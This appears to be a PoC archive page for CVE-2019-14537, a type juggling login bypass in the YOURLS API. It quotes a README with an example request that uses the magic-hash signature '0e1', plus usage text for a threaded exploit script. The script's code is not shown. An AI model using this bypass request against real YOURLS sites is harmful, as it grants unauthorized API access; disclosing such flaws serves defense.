Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1325 CNY

100%

CVE-2019-14537 PoC — YOURLS 授权问题漏洞

Source
Associated Vulnerability
Title:YOURLS 授权问题漏洞 (CVE-2019-14537)
Description:YOURLS through 1.7.3 is affected by a type juggling vulnerability in the api component that can result in login bypass.
Description
CVE-2019-14537  PoC
Readme
# YOURLS: CVE-2019-14537 PoC

![alt text](https://raw.githubusercontent.com/Wocanilo/CVE-2019-14537/master/poc_preview.png)

When you get a valid timestamp you will be able to make requests to the api. 

http://domain.com/yourls-api.php?signature=0e1&action=db-stats&timestamp=VALID_TIMESTAMP

## Usage

```
usage: main.py [-h] [--vhost VHOST] [--threads THREADS] [--path PATH]
               [--port PORT]
               [ip]

CVE-2019-14537 PoC

positional arguments:
  ip                 Yourls IP

optional arguments:
  -h, --help         show this help message and exit
  --vhost VHOST      host name (domain name)
  --threads THREADS  number of threads (default: 10)
  --path PATH        yourls-api.php path (default: /yourls-api.php)
  --port PORT        port (default: 80)
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →